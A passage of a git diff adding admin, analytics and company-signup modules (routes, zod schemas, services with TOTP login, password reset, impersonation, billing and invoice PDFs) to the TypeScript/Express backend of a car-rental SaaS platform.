'application/pdf') + res.setHeader('Content-Disposition', `attachment; filename="${invoiceNumber}.pdf"`) + res.setHeader('Content-Length', pdfBuffer.length) + res.end(pdfBuffer) + } catch (err) { next(err) } +}) + +// ─── Site config ─────────────────────────────────────────────── + +router.get('/site-config/marketplace-homepage', requireAdminAuth, async (req, res, next) => { + try { + ok(res, { data: await service.getMarketplaceHomepage() }) + } catch (err) { next(err) } +}) + +router.patch('/site-config/marketplace-homepage', requireAdminAuth, requireAdminRole('SUPPORT'), async (req, res, next) => { + try { + const { homepage } = parseBody(homepageUpdateSchema, req) + ok(res, { data: await service.updateMarketplaceHomepage(homepage, req.admin.id, req.ip) }) + } catch (err) { next(err) } +}) + +export default router diff --git a/apps/api/src/modules/admin/admin.schemas.ts b/apps/api/src/modules/admin/admin.schemas.ts new file mode 100644 index 0000000..4eef9d5 --- /dev/null +++ b/apps/api/src/modules/admin/admin.schemas.ts @@ -0,0 +1,176 @@ +import { z } from 'zod' +import type { MarketplaceHomepageContent, MarketplaceHomepageMetric, MarketplaceHomepagePillar, MarketplaceHomepageSectionType, MarketplaceHomepageStep } from '@rentaldrivego/types' + +export const loginSchema = z.object({ + email: z.string().email().max(255).trim().toLowerCase(), + password: z.string().max(128), + totpCode: z.string().length(6).optional(), +}) + +export const forgotPasswordSchema = z.object({ + email: z.string().email().max(255).trim().toLowerCase(), +}) + +export const resetPasswordSchema = z.object({ + token: z.string().min(1), + password: z.string().min(8).max(128), +}) + +export const totpVerifySchema = z.object({ + code: z.string().length(6), +}) + +export const companiesQuerySchema = z.object({ + q: z.string().optional(), + status: z.string().optional(), + plan: z.string().optional(), + page: z.coerce.number().int().min(1).default(1), + pageSize: z.coerce.number().int().min(1).max(100).default(20), +}) + +export const rentersQuerySchema = z.object({ + q: z.string().optional(), + blocked: z.string().optional(), + page: z.coerce.number().int().min(1).default(1), + pageSize: z.coerce.number().int().min(1).max(100).default(20), +}) + +export const auditLogQuerySchema = z.object({ + adminId: z.string().optional(), + action: z.string().optional(), + companyId: z.string().optional(), + entityId: z.string().optional(), + page: z.coerce.number().int().min(1).default(1), + pageSize: z.coerce.number().int().min(1).max(100).default(50), +}) + +export const billingQuerySchema = z.object({ + status: z.string().optional(), + plan: z.string().optional(), + page: z.coerce.number().int().min(1).default(1), + pageSize: z.coerce.number().int().min(1).max(100).default(20), +}) + +export const invoicesQuerySchema = z.object({ + page: z.coerce.number().int().min(1).default(1), + pageSize: z.coerce.number().int().min(1).max(100).default(20), +}) + +export const permissionSchema = z.object({ + resource: z.enum(['COMPANIES', 'COMPANY_EMPLOYEES', 'SUBSCRIPTIONS', 'PAYMENTS', 'OFFERS', 'RENTERS', 'ADMIN_USERS', 'AUDIT_LOGS', 'PLATFORM_METRICS']), + actions: z.array(z.enum(['READ', 'CREATE', 'UPDATE', 'DELETE', 'SUSPEND', 'IMPERSONATE'])).min(1), +}) + +export const createAdminSchema = z.object({ + email: z.string().email(), + firstName: z.string(), + lastName: z.string(), + role: z.enum(['SUPER_ADMIN', 'ADMIN', 'SUPPORT', 'FINANCE', 'VIEWER']), + password: z.string().min(8), + permissions: z.array(permissionSchema).optional(), +}) + +export const adminRoleSchema = z.object({ + role: z.enum(['SUPER_ADMIN', 'ADMIN', 'SUPPORT', 'FINANCE', 'VIEWER']), +}) + +export const adminPermissionsSchema = z.object({ + permissions: z.array(permissionSchema), +}) + +export const companyStatusSchema = z.object({ + status: z.enum(['ACTIVE', 'SUSPENDED', 'CANCELLED']), + reason: z.string().optional(), +}) + +const nullableString = z.union([z.string(), z.null()]).optional() +const nullableEmail = z.union([z.string().email(), z.null()]).optional() +const nullableUrl = z.union([z.string().url(), z.null()]).optional() +const nullableDate = z.union([z.string().datetime(), z.string().regex(/^\d{4}-\d{2}-\d{2}$/), z.null()]).optional() + +export const adminCompanyUpdateSchema = z.object({ + company: z.object({ + name: z.string().min(1).optional(), slug: z.string().min(1).optional(), + email: z.string().email().optional(), phone: nullableString, + status: z.enum(['PENDING', 'TRIALING', 'ACTIVE', 'PAST_DUE', 'SUSPENDED', 'CANCELLED']).optional(), + subscriptionPaymentRef: nullableString, + }).optional(), + subscription: z.object({ + plan: z.enum(['STARTER', 'GROWTH', 'PRO']).optional(), + billingPeriod: z.enum(['MONTHLY', 'ANNUAL']).optional(), + status: z.enum(['TRIALING', 'ACTIVE', 'PAST_DUE', 'CANCELLED', 'UNPAID']).optional(), + currency: z.enum(['MAD', 'USD', 'EUR']).optional(), + trialStartAt: nullableDate, trialEndAt: nullableDate, + currentPeriodStart: nullableDate, currentPeriodEnd: nullableDate, + cancelledAt: nullableDate, cancelAtPeriodEnd: z.boolean().optional(), + }).optional(), + brand: z.object({ + displayName: z.string().min(1).optional(), tagline: nullableString, + subdomain: z.string().min(1).optional(), customDomain: nullableString, + publicEmail: nullableEmail, publicPhone: nullableString, publicAddress: nullableString, + publicCity: nullableString, publicCountry: nullableString, websiteUrl: nullableUrl, + whatsappNumber: nullableString, defaultLocale: z.string().min(2).optional(), + defaultCurrency: z.enum(['MAD', 'USD', 'EUR']).optional(), + isListedOnMarketplace: z.boolean().optional(), + homePageConfig: z.any().optional(), + menuConfig: z.any().optional(), + }).optional(), + contractSettings: z.object({ + legalName: nullableString, registrationNumber: nullableString, taxId: nullableString, + terms: z.string().optional(), + fuelPolicyType: z.enum(['FULL_TO_FULL', 'FULL_TO_EMPTY', 'SAME_TO_SAME', 'PREPAID', 'FREE']).optional(), + lateFeePerHour: z.number().int().nullable().optional(), taxRate: z.number().nullable().optional(), + signatureRequired: z.boolean().optional(), showTax: z.boolean().optional(), + }).optional(), + accountingSettings: z.object({ + reportingPeriod: z.enum(['WEEKLY', 'MONTHLY', 'QUARTERLY', 'ANNUAL']).optional(), + fiscalYearStart: z.number().int().min(1).max(12).optional(), + currency: z.enum(['MAD', 'USD', 'EUR']).optional(), + accountantEmail: nullableEmail, accountantName: nullableString, + autoSendReport: z.boolean().optional(), + reportFormat: z.enum(['PDF', 'CSV', 'BOTH']).optional(), + }).optional(), +}) + +const marketplaceMetricSchema: z.ZodType = z.object({ value: z.string().min(1), label: z.string().min(1) }) +const marketplacePillarSchema: z.ZodType = z.object({ title: z.string().min(1), body: z.string().min(1) }) +const marketplaceStepSchema: z.ZodType = z.object({ step: z.string().min(1), title: z.string().min(1), body: z.string().min(1) }) +const marketplaceSectionSchema: z.ZodType = z.enum(['hero', 'surface', 'pillars', 'audiences', 'features', 'steps', 'closing']) + +const marketplaceHomepageContentSchema: z.ZodType = z.object({ + sections: z.array(marketplaceSectionSchema).min(1), + heroKicker: z.string().min(1), heroTitle: z.string().min(1), heroBody: z.string().min(1), + startTrial: z.string().min(1), exploreVehicles: z.string().min(1), + surfaceLabel: z.string().min(1), surfaceTitle: z.string().min(1), surfaceBody: z.string().min(1), + liveLabel: z.string().min(1), trustedFleets: z.string().min(1), brandedFlows: z.string().min(1), multiTenant: z.string().min(1), + companyKicker: z.string().min(1), companyTitle: z.string().min(1), companyBody: z.string().min(1), + renterKicker: z.string().min(1), renterTitle: z.string().min(1), renterBody: z.string().min(1), + pillars: z.array(marketplacePillarSchema).length(3), + metrics: z.array(marketplaceMetricSchema).length(3), + featureLabel: z.string().min(1), features: z.array(z.string().min(1)).min(1), + stepsTitle: z.string().min(1), steps: z.array(marketplaceStepSchema).length(3), stepLabel: z.string().min(1), + readyKicker: z.string().min(1), readyTitle: z.string().min(1), readyBody: z.string().min(1), + viewPricing: z.string().min(1), createWorkspace: z.string().min(1), +}) + +export const marketplaceHomepageConfigSchema = z.object({ + en: marketplaceHomepageContentSchema, + fr: marketplaceHomepageContentSchema, + ar: marketplaceHomepageContentSchema, +}) + +export const idParamSchema = z.object({ + id: z.string().min(1), +}) + +export const companyIdParamSchema = z.object({ + companyId: z.string().min(1), +}) + +export const invoiceIdParamSchema = z.object({ + invoiceId: z.string().min(1), +}) + +export const homepageUpdateSchema = z.object({ + homepage: marketplaceHomepageConfigSchema, +}) diff --git a/apps/api/src/modules/admin/admin.service.ts b/apps/api/src/modules/admin/admin.service.ts new file mode 100644 index 0000000..e523afe --- /dev/null +++ b/apps/api/src/modules/admin/admin.service.ts @@ -0,0 +1,298 @@ +import bcrypt from 'bcryptjs' +import jwt from 'jsonwebtoken' +import crypto from 'crypto' +import { authenticator } from 'otplib' +import qrcode from 'qrcode' +import { getMarketplaceHomepageContent, saveMarketplaceHomepageContent } from '../../services/platformContentService' +import { generateInvoicePdf, buildInvoiceNumber } from '../../services/invoicePdfService' +import { sendTransactionalEmail } from '../../services/notificationService' +import * as presenter from './admin.presenter' +import * as repo from './admin.repo' + +const ADMIN_RESET_TTL_MINUTES = 60 + +const PLAN_MONTHLY_AMOUNT: Record = { + STARTER: 29900, + GROWTH: 59900, + PRO: 99900, +} + +function signAdminToken(adminId: string) { + return jwt.sign({ sub: adminId, type: 'admin' }, process.env.JWT_SECRET!, { expiresIn: '8h' }) +} + +function toAuditJson(value: T) { + return JSON.parse(JSON.stringify(value)) +} + +function ensureAdminBasePath(baseUrl: string) { + try { + const url = new URL(baseUrl) + const pathname = url.pathname.replace(/\/$/, '') + if (!pathname.endsWith('/admin')) url.pathname = `${pathname}/admin` + return url.toString().replace(/\/$/, '') + } catch { + const trimmed = baseUrl.replace(/\/$/, '') + return trimmed.endsWith('/admin') ? trimmed : `${trimmed}/admin` + } +} + +export async function login(email: string, password: string, totpCode?: string) { + const admin = await repo.findAdminByEmail(email) + if (!admin || !admin.isActive) return null + + const valid = await bcrypt.compare(password, admin.passwordHash) + if (!valid) return null + + if (admin.totpEnabled) { + if (!totpCode) return { totpRequired: true } as const + if (!authenticator.verify({ token: totpCode, secret: admin.totpSecret! })) { + return { invalidTotp: true } as const + } + } + + await repo.updateAdminLastLogin(admin.id) + await repo.createAuditLog({ + adminUserId: admin.id, + action: 'ADMIN_LOGIN', + resource: 'AdminUser', + resourceId: admin.id, + }) + + return presenter.presentAdminSession(admin, signAdminToken(admin.id)) +} + +export async function setupTotp(adminId: string, email: string) { + const secret = authenticator.generateSecret() + await repo.updateAdminTotpSecret(adminId, secret) + const otpauth = authenticator.keyuri(email, 'RentalDriveGo Admin', secret) + const qrCode = await qrcode.toDataURL(otpauth) + return { secret, qrCode } +} + +export async function verifyTotp(adminId: string, code: string) { + const admin = await repo.findAdminByIdOrThrow(adminId) + if (!admin.totpSecret) return false + + const valid = authenticator.verify({ token: code, secret: admin.totpSecret }) + if (valid) await repo.enableAdminTotp(adminId) + return valid +} + +export async function forgotPassword(email: string) { + const admin = await repo.findAdminByEmail(email) + if (!admin || !admin.isActive) return + + const rawToken = crypto.randomBytes(32).toString('hex') + const expiresAt = new Date(Date.now() + ADMIN_RESET_TTL_MINUTES * 60 * 1000) + await repo.setAdminPasswordReset(admin.id, rawToken, expiresAt) + + const adminUrl = ensureAdminBasePath( + process.env.ADMIN_URL ?? process.env.NEXT_PUBLIC_ADMIN_URL ?? 'http://localhost:3002/admin', + ) + const resetUrl = `${adminUrl}/reset-password?token=${rawToken}` + + await sendTransactionalEmail({ + to: email, + subject: 'Reset your RentalDriveGo admin password', + html: `

Hi ${admin.firstName},

Reset password

Expires in ${ADMIN_RESET_TTL_MINUTES} minutes.

`, + text: `Hi ${admin.firstName},\n\nReset here: ${resetUrl}\n\nExpires in ${ADMIN_RESET_TTL_MINUTES} minutes.`, + }).catch((err) => console.error('[AdminForgotPassword]', err?.message)) +} + +export async function resetPassword(token: string, password: string) { + const admin = await repo.findAdminByResetToken(token) + if (!admin) return false + + await repo.updateAdminPassword(admin.id, await bcrypt.hash(password, 12)) + return true +} + +export async function listCompanies(query: { q?: string; status?: string; plan?: string; page: number; pageSize: number }) { + const { data, total } = await repo.listCompaniesPage(query) + return presenter.presentPaginated(data, total, query.page, query.pageSize) +} + +export function getCompany(id: string) { + return repo.getCompanyDetail(id) +} + +export async function updateCompany(id: string, body: any, adminId: string, ip?: string) { + const before = await repo.getCompanyUpdateSnapshot(id) + const updated = await repo.applyCompanyUpdate(id, body, before) + await repo.createAuditLog({ + adminUserId: adminId, + action: 'UPDATE_COMPANY', + resource: 'Company', + resourceId: id, + companyId: id, + before: toAuditJson(before), + after: toAuditJson(body), + ipAddress: ip, + }) + return updated +} + +export async function setCompanyStatus(id: string, status: string, reason: string | undefined, adminId: string, ip?: string) { + const before = await repo.getCompanyUpdateSnapshot(id) + const updated = await repo.updateCompanyStatus(id, status) + await repo.createAuditLog({ + adminUserId: adminId, + action: `SET_COMPANY_STATUS_${status}`, + resource: 'Company', + resourceId: id, + companyId: id, + before: { status: before.status }, + after: { status }, + note: reason, + ipAddress: ip, + }) + return updated +} + +export async function deleteCompany(id: string, adminId: string, ip?: string) { + await repo.deleteCompany(id) + await repo.createAuditLog({ + adminUserId: adminId, + action: 'DELETE_COMPANY', + resource: 'Company', + resourceId: id, + ipAddress: ip, + }) +} + +export async function impersonateCompany(id: string, adminId: string, ip?: string) { + const company = await repo.getCompanyForImpersonation(id) + const token = jwt.sign( + { + sub: company.employees[0]?.id, + companyId: company.id, + isImpersonation: true, + type: 'employee', + }, + process.env.JWT_SECRET!, + { expiresIn: '30m' }, + ) + + await repo.createAuditLog({ + adminUserId: adminId, + action: 'IMPERSONATE_COMPANY', + resource: 'Company', + resourceId: id, + companyId: id, + ipAddress: ip, + }) + + return { token, expiresIn: 1800 } +} + +export async function listRenters(query: { q?: string; blocked?: string; page: number; pageSize: number }) { + const { data, total } = await repo.listRentersPage(query) + return presenter.presentPaginated(data, total, query.page, query.pageSize) +} + +export function setRenterActive(id: string, isActive: boolean) { + return repo.updateRenterActive(id, isActive) +} + +export function getPlatformMetrics() { + return repo.getPlatformMetricCounts() +} + +export async function getAuditLogs(query: { adminId?: string; action?: string; companyId?: string; entityId?: string; page: number; pageSize: number }) { + const { data, total } = await repo.listAuditLogsPage(query) + return presenter.presentPaginated(data, total, query.page, query.pageSize) +} + +export async function listAdmins() { + const admins = await repo.listAdmins() + return admins.map((admin) => presenter.presentAdminUser(admin)) +} + +export async function createAdmin(body: { email: string; firstName: string; lastName: string; role: string; password: string; permissions?: any[] }) { + const admin = await repo.createAdmin({ + ...body, + passwordHash: await bcrypt.hash(body.password, 12), + }) + return presenter.presentAdminUser(admin) +} + +export function updateAdminRole(id: string, role: string) { + return repo.updateAdminRole(id, role) +} + +export async function updateAdminPermissions(id: string, permissions: any[]) { + const admin = await repo.replaceAdminPermissions(id, permissions) + return presenter.presentAdminUser(admin) +} + +export async function getBilling(query: { status?: string; plan?: string; page: number; pageSize: number }) { + const [{ data, total }, activeSubscriptions, stats] = await Promise.all([ + repo.listBillingPage(query), + repo.listActiveSubscriptionsForMrr(), + repo.getBillingStatusCounts(), + ]) + + const mrr = activeSubscriptions.reduce((acc, subscription) => { + const monthlyAmount = PLAN_MONTHLY_AMOUNT[subscription.plan] ?? 0 + return acc + (subscription.billingPeriod === 'ANNUAL' ? Math.round(monthlyAmount * 10 / 12) : monthlyAmount) + }, 0) + + return presenter.presentPaginated(data, total, query.page, query.pageSize, { + stats: { mrr, ...stats }, + }) +} + +export async function getCompanyInvoices(companyId: string, query: { page: number; pageSize: number }) { + const { data, total } = await repo.listCompanyInvoicesPage(companyId, query) + return presenter.presentPaginated(data, total, query.page, query.pageSize) +} + +export async function getInvoicePdf(invoiceId: string) { + const invoice = await repo.getInvoicePdfRecord(invoiceId) + const invoiceNumber = buildInvoiceNumber(invoice.id, invoice.createdAt) + const transactionId = invoice.amanpayTransactionId ?? invoice.paypalCaptureId ?? null + const pdfBuffer = await generateInvoicePdf({ + invoiceNumber, + issueDate: invoice.createdAt.toISOString(), + dueDate: invoice.status === 'PENDING' ? invoice.createdAt.toISOString() : null, + company: { + name: invoice.company.name, + email: invoice.company.email, + phone: invoice.company.phone, + address: invoice.company.address, + }, + subscription: { + plan: invoice.subscription.plan, + billingPeriod: invoice.subscription.billingPeriod, + currentPeriodStart: invoice.subscription.currentPeriodStart?.toISOString(), + currentPeriodEnd: invoice.subscription.currentPeriodEnd?.toISOString(), + currency: invoice.subscription.currency, + }, + amount: invoice.amount, + currency: invoice.currency, + status: invoice.status, + paymentProvider: invoice.paymentProvider, + transactionId, + paidAt: invoice.paidAt?.toISOString(), + }) + + return { pdfBuffer, invoiceNumber } +} + +export function getMarketplaceHomepage() { + return getMarketplaceHomepageContent() +} + +export async function updateMarketplaceHomepage(homepage: any, adminId: string, ip?: string) { + const saved = await saveMarketplaceHomepageContent(homepage) + await repo.createAuditLog({ + adminUserId: adminId, + action: 'UPDATE', + resource: 'MarketplaceHomepage', + after: toAuditJson(saved), + ipAddress: ip, + userAgent: undefined, + }) + return saved +} diff --git a/apps/api/src/modules/analytics/analytics.routes.ts b/apps/api/src/modules/analytics/analytics.routes.ts new file mode 100644 index 0000000..6e8fb6e --- /dev/null +++ b/apps/api/src/modules/analytics/analytics.routes.ts @@ -0,0 +1,49 @@ +import { Router } from 'express' +import { requireCompanyAuth } from '../../middleware/requireCompanyAuth' +import { requireTenant } from '../../middleware/requireTenant' +import { requireSubscription } from '../../middleware/requireSubscription' +import { requireRole } from '../../middleware/requireRole' +import { parseQuery } from '../../http/validate' +import { ok } from '../../http/respond' +import * as service from './analytics.service' +import { summaryQuerySchema, reportQuerySchema } from './analytics.schemas' + +const router = Router() + +router.use(requireCompanyAuth, requireTenant, requireSubscription) + +router.get('/summary', async (req, res, next) => { + try { + const { period } = parseQuery(summaryQuerySchema, req) + ok(res, { data: await service.getSummary(req.companyId, period) }) + } catch (err) { next(err) } +}) + +router.get('/dashboard', async (req, res, next) => { + try { + ok(res, { data: await service.getDashboard(req.companyId) }) + } catch (err) { next(err) } +}) + +router.get('/sources', async (req, res, next) => { + try { + ok(res, { data: await service.getSources(req.companyId) }) + } catch (err) { next(err) } +}) + +router.get('/report', requireRole('MANAGER'), async (req, res, next) => { + try { + const query = parseQuery(reportQuerySchema, req) + const result = await service.getReport(req.companyId, query) + if (result.format === 'CSV') { + const start = result.startDate.toISOString().slice(0, 10) + const end = result.endDate.toISOString().slice(0, 10) + res.setHeader('Content-Type', 'text/csv') + res.setHeader('Content-Disposition', `attachment; filename="report-${start}-${end}.csv"`) + return res.send(result.csv) + } + ok(res, { data: result.report }) + } catch (err) { next(err) } +}) + +export default router diff --git a/apps/api/src/modules/analytics/analytics.schemas.ts b/apps/api/src/modules/analytics/analytics.schemas.ts new file mode 100644 index 0000000..c257fb9 --- /dev/null +++ b/apps/api/src/modules/analytics/analytics.schemas.ts @@ -0,0 +1,12 @@ +import { z } from 'zod' + +export const summaryQuerySchema = z.object({ + period: z.string().default('30d'), +}) + +export const reportQuerySchema = z.object({ + from: z.string().optional(), + to: z.string().optional(), + format: z.string().default('JSON'), + period: z.string().optional(), +}) diff --git a/apps/api/src/modules/analytics/analytics.service.ts b/apps/api/src/modules/analytics/analytics.service.ts new file mode 100644 index 0000000..f7046d8 --- /dev/null +++ b/apps/api/src/modules/analytics/analytics.service.ts @@ -0,0 +1,100 @@ +import { prisma } from '../../lib/prisma' +import { generateFinancialReport, toCsv } from '../../services/financialReportService' + +function getRangeFromPeriod(period: string) { + const now = new Date() + switch (period) { + case 'WEEKLY': return { from: new Date(now.getTime() - 7 * 24 * 60 * 60 * 1000), to: now } + case 'QUARTERLY': return { from: new Date(now.getFullYear(), now.getMonth() - 2, 1), to: now } + case 'ANNUAL': return { from: new Date(now.getFullYear(), 0, 1), to: now } + default: return { from: new Date(now.getFullYear(), now.getMonth(), 1), to: now } + } +} + +function pct(current: number, previous: number) { + if (previous === 0) return current > 0 ? 100 : 0 + return Math.round(((current - previous) / previous) * 100) +} + +export async function getSummary(companyId: string, period: string) { + const days = parseInt(period.replace('d', '')) || 30 + const since = new Date(Date.now() - days * 24 * 60 * 60 * 1000) + const [totalReservations, activeVehicles, totalRevenue, totalCustomers] = await Promise.all([ + prisma.reservation.count({ where: { companyId, createdAt: { gte: since } } }), + prisma.vehicle.count({ where: { companyId, status: 'AVAILABLE' } }), + prisma.reservation.aggregate({ where: { companyId, status: { in: ['COMPLETED'] }, createdAt: { gte: since } }, _sum: { totalAmount: true } }), + prisma.customer.count({ where: { companyId } }), + ]) + return { totalReservations, activeVehicles, totalRevenue: totalRevenue._sum.totalAmount ?? 0, totalCustomers, period } +} + +export async function getDashboard(companyId: string) { + const now = new Date() + const monthStart = new Date(now.getFullYear(), now.getMonth(), 1) + const prevMonthStart = new Date(now.getFullYear(), now.getMonth() - 1, 1) + const prevMonthEnd = new Date(monthStart.getTime() - 1) + + const [ + totalBookings, previousBookings, activeVehicles, previousActiveVehicles, + totalCustomers, previousCustomers, monthlyRevenueAgg, previousRevenueAgg, + recentReservations, sourceGroups, subscription, + ] = await Promise.all([ + prisma.reservation.count({ where: { companyId, createdAt: { gte: monthStart } } }), + prisma.reservation.count({ where: { companyId, createdAt: { gte: prevMonthStart, lte: prevMonthEnd } } }), + prisma.vehicle.count({ where: { companyId, status: { in: ['AVAILABLE', 'RENTED'] } } }), + prisma.vehicle.count({ where: { companyId, createdAt: { lte: prevMonthEnd }, status: { in: ['AVAILABLE', 'RENTED'] } } }), + prisma.customer.count({ where: { companyId } }), + prisma.customer.count({ where: { companyId, createdAt: { lte: prevMonthEnd } } }), + prisma.reservation.aggregate({ where: { companyId, status: { in: ['CONFIRMED', 'ACTIVE', 'COMPLETED'] }, createdAt: { gte: monthStart } }, _sum: { totalAmount: true } }), + prisma.reservation.aggregate({ where: { companyId, status: { in: ['CONFIRMED', 'ACTIVE', 'COMPLETED'] }, createdAt: { gte: prevMonthStart, lte: prevMonthEnd } }, _sum: { totalAmount: true } }), + prisma.reservation.findMany({ where: { companyId }, include: { customer: true, vehicle: true }, orderBy: { createdAt: 'desc' }, take: 8 }), + prisma.reservation.groupBy({ by: ['source'], where: { companyId }, _count: { id: true }, _sum: { totalAmount: true } }), + prisma.subscription.findUnique({ where: { companyId } }), + ]) + + return { + kpis: { + totalBookings, + activeVehicles, + monthlyRevenue: monthlyRevenueAgg._sum.totalAmount ?? 0, + totalCustomers, + bookingsChange: pct(totalBookings, previousBookings), + vehiclesChange: pct(activeVehicles, previousActiveVehicles), + revenueChange: pct(monthlyRevenueAgg._sum.totalAmount ?? 0, previousRevenueAgg._sum.totalAmount ?? 0), + customersChange: pct(totalCustomers, previousCustomers), + }, + recentReservations: (recentReservations as any[]).map((r) => ({ + id: r.id, + bookingRef: r.contractNumber ?? r.id.slice(-8).toUpperCase(), + customerName: `${r.customer.firstName} ${r.customer.lastName}`, + vehicleName: `${r.vehicle.make} ${r.vehicle.model}`, + startDate: r.startDate, + endDate: r.endDate, + status: r.status, + totalAmount: r.totalAmount, + })), + sourceBreakdown: (sourceGroups as any[]).map((g) => ({ + source: g.source, + count: g._count.id, + revenue: g._sum.totalAmount ?? 0, + })), + subscription: subscription ? { + status: subscription.status, + planName: subscription.plan, + trialEndsAt: subscription.trialEndAt, + } : null, + } +} + +export async function getSources(companyId: string) { + return prisma.reservation.groupBy({ by: ['source'], where: { companyId }, _count: { id: true } }) +} + +export async function getReport(companyId: string, query: { from?: string; to?: string; format: string; period?: string }) { + const accountingSettings = await prisma.accountingSettings.findUnique({ where: { companyId } }) + const derivedRange = getRangeFromPeriod(query.period || accountingSettings?.reportingPeriod || 'MONTHLY') + const startDate = query.from ? new Date(query.from) : derivedRange.from + const endDate = query.to ? new Date(query.to) : derivedRange.to + const report = await generateFinancialReport(companyId, startDate, endDate) + return { report, startDate, endDate, format: query.format, csv: query.format === 'CSV' ? toCsv(report.rows) : null } +} diff --git a/apps/api/src/modules/auth/auth.company.repo.ts b/apps/api/src/modules/auth/auth.company.repo.ts new file mode 100644 index 0000000..a00f78a --- /dev/null +++ b/apps/api/src/modules/auth/auth.company.repo.ts @@ -0,0 +1,115 @@ +import { prisma } from '../../lib/prisma' + +type DbClient = Pick + +type CompanySignupInput = { + companyName: string + slug: string + email: string + companyPhone: string + streetAddress: string + city: string + country: string + zipCode: string + legalForm: string + managerName: string + fax?: string + yearsActive: string + currency: 'MAD' | 'USD' | 'EUR' + registrationNumber: string + plan: 'STARTER' | 'GROWTH' | 'PRO' + billingPeriod: 'MONTHLY' | 'ANNUAL' + preferredLanguage: 'en' | 'fr' | 'ar' + firstName: string + lastName: string + passwordHash: string + now: Date + trialEndAt: Date +} + +export function findCompanyBySlug(slug: string) { + return prisma.company.findUnique({ where: { slug } }) +} + +export function findCompanyByEmail(email: string) { + return prisma.company.findUnique({ where: { email } }) +} + +export function findEmployeeByEmail(email: string) { + return prisma.employee.findFirst({ where: { email } }) +} + +export async function createCompanySignup(db: DbClient, input: CompanySignupInput) { + const company = await db.company.create({ + data: { + name: input.companyName, + slug: input.slug, + email: input.email, + phone: input.companyPhone, + address: { + streetAddress: input.streetAddress, + city: input.city, + country: input.country, + zipCode: input.zipCode, + legalForm: input.legalForm, + managerName: input.managerName, + fax: input.fax || null, + yearsActive: input.yearsActive, + }, + status: 'TRIALING', + }, + }) + + await db.brandSettings.create({ + data: { + companyId: company.id, + displayName: input.companyName, + subdomain: input.slug, + publicEmail: input.email, + publicPhone: input.companyPhone, + publicAddress: input.streetAddress, + publicCity: input.city, + publicCountry: input.country, + defaultCurrency: input.currency, + }, + }) + + await db.contractSettings.create({ + data: { + companyId: company.id, + legalName: input.companyName, + registrationNumber: input.registrationNumber, + }, + }) + + await db.subscription.create({ + data: { + companyId: company.id, + plan: input.plan, + billingPeriod: input.billingPeriod, + currency: input.currency, + status: 'TRIALING', + trialStartAt: input.now, + trialEndAt: input.trialEndAt, + currentPeriodStart: input.now, + currentPeriodEnd: input.trialEndAt, + }, + }) + + const employee = await db.employee.create({ + data: { + companyId: company.id, + clerkUserId: `local_owner_${company.id}`, + firstName: input.firstName, + lastName: input.lastName, + email: input.email, + phone: input.companyPhone, + passwordHash: input.passwordHash, + role: 'OWNER', + preferredLanguage: input.preferredLanguage, + isActive: true, + }, + }) + + return { company, employee } +} diff --git a/apps/api/src/modules/auth/auth.company.routes.ts b/apps/api/src/modules/auth/auth.company.routes.ts new file mode 100644 index 0000000..edd8b90 --- /dev/null +++ b/apps/api/src/modules/auth/auth.company.routes.ts @@ -0,0 +1,26 @@ +import { Router } from 'express' +import { parseBody } from '../../http/validate' +import { created } from '../../http/respond' +import { companySignupSchema } from './auth.company.schemas' +import * as service from './auth.company.service' + +const router = Router() + +router.post('/signup', async (req, res, next) => { + try { + const body = parseBody(companySignupSchema, req) + created(res, await service.signup(body)) + } catch (err) { next(err) } +}) + +router.post('/complete-signup', (_req, res) => { + service.completeSignupDisabled() + res.end() +}) + +router.post('/verify-email', (_req, res) => { + service.verifyEmailDisabled() + res.end() +}) + +export default router diff --git a/apps/api/src/modules/auth/auth.company.schemas.ts b/apps/api/src/modules/auth/auth.company.schemas.ts new file mode 100644 index 0000000..9b84b4e --- /dev/null +++ b/apps/api/src/modules/auth/auth.company.schemas.ts @@ -0,0 +1,23 @@ +import { z } from 'zod' + +export const companySignupSchema = z.object({ + firstName: z.string().min(1).max(80), + lastName: z.string().min(1).max(80), + email: z.string().email(), + password: z.string().min(8).max(128), + companyName: z.string().min(2).max(120), + legalForm: z.string().min(1).max(80), + registrationNumber: z.string().min(1).max(120), + streetAddress: z.string().min(1).max(200), + city: z.string().min(1).max(120), + country: z.string().min(1).max(120), + zipCode: z.string().min(1).max(40), + companyPhone: z.string().min(1).max(80), + fax: z.string().max(80).optional(), + yearsActive: z.string().min(1).max(80), + preferredLanguage: z.enum(['en', 'fr', 'ar']).default('en'), + plan: z.enum(['STARTER', 'GROWTH', 'PRO']), + billingPeriod: z.enum(['MONTHLY', 'ANNUAL']), + currency: z.enum(['MAD', 'USD', 'EUR']), + paymentProvider: z.enum(['AMANPAY', 'PAYPAL']), +}) diff --git a/apps/api/src/modules/auth/auth.company.service.ts b/apps/api/src/modules/auth/auth.company.service.ts new file mode 100644 index 0000000..d8ce190 --- /dev/null +++ b/apps/api/src/modules/auth/auth.company.service.ts @@ -0,0 +1,103 @@ +import bcrypt from 'bcryptjs' +import { AppError } from '../../http/errors' +import { prisma } from '../../lib/prisma' +import { sendNotification } from '../../services/notificationService' +import { signupEmail, type Lang } from '../../lib/emailTranslations' +import { presentCompanySignup } from './auth.presenter' +import * as repo from './auth.company.repo' +import { companySignupSchema } from './auth.company.schemas' +import type { output } from 'zod' + +type CompanySignupInput = output + +function slugify(value: string) { + return value.toLowerCase().replace(/[^a-z0-9]+/g, '-').replace(/^-+|-+$/g, '').slice(0, 50) || 'company' +} + +async function generateUniqueSlug(baseName: string) { + const base = slugify(baseName) + + for (let attempt = 0; attempt < 25; attempt++) { + const slug = attempt === 0 ? base : `${base}-${attempt + 1}` + const existing = await repo.findCompanyBySlug(slug) + if (!existing) return slug + } + + return `${base}-${Date.now().toString(36)}` +} + +export async function signup(body: CompanySignupInput) { + if (await repo.findCompanyByEmail(body.email)) { + throw new AppError('A company account with this email already exists', 409, 'email_taken') + } + + if (await repo.findEmployeeByEmail(body.email)) { + throw new AppError('An employee account with this email already exists', 409, 'email_taken') + } + + const slug = await generateUniqueSlug(body.companyName) + const now = new Date() + const trialEndAt = new Date(now.getTime() + 14 * 24 * 60 * 60 * 1000) + const passwordHash = await bcrypt.hash(body.password, 12) + + const result = await prisma.$transaction((tx) => repo.createCompanySignup(tx, { + companyName: body.companyName, + slug, + email: body.email, + companyPhone: body.companyPhone, + streetAddress: body.streetAddress, + city: body.city, + country: body.country, + zipCode: body.zipCode, + legalForm: body.legalForm, + managerName: `${body.firstName} ${body.lastName}`.trim(), + fax: body.fax, + yearsActive: body.yearsActive, + currency: body.currency, + registrationNumber: body.registrationNumber, + plan: body.plan, + billingPeriod: body.billingPeriod, + preferredLanguage: body.preferredLanguage, + firstName: body.firstName, + 